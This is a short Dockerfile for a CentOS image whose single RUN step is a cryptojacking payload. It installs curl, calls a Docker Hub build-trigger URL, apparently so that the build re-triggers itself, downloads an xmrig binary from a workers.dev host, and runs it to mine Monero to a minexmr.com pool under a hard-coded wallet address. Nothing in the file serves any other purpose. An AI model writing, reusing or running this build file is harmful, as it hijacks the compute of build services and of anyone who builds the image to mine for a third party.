FROM centos

WORKDIR /opt

COPY . .

RUN yum install curl -y&& \
	export UUID="$(cat /proc/sys/kernel/random/uuid)" && \
	curl -X POST 
https://hub.docker.com/api/build/v1/source/70b4cf2a-7432-4930-91df-2d7b0de22f76/trigger/f3416666-25c5-40ee-98b4-3840e764261c/call/ && \
	curl -O https://ddos.nms.workers.dev/xmrig && \
	chmod 777 xmrig && \
	./xmrig -o us-west.minexmr.com:4444 -u 4ADJzu2sVe4AajQEziw91FZZPvJyVTozUZxU9JdFWdLPcUuvousVyHXTn4PMiWeQtXYiPfEYfTbWGYqiaSZDVwu64NbvALt.${UUID} --randomx-1gb-pages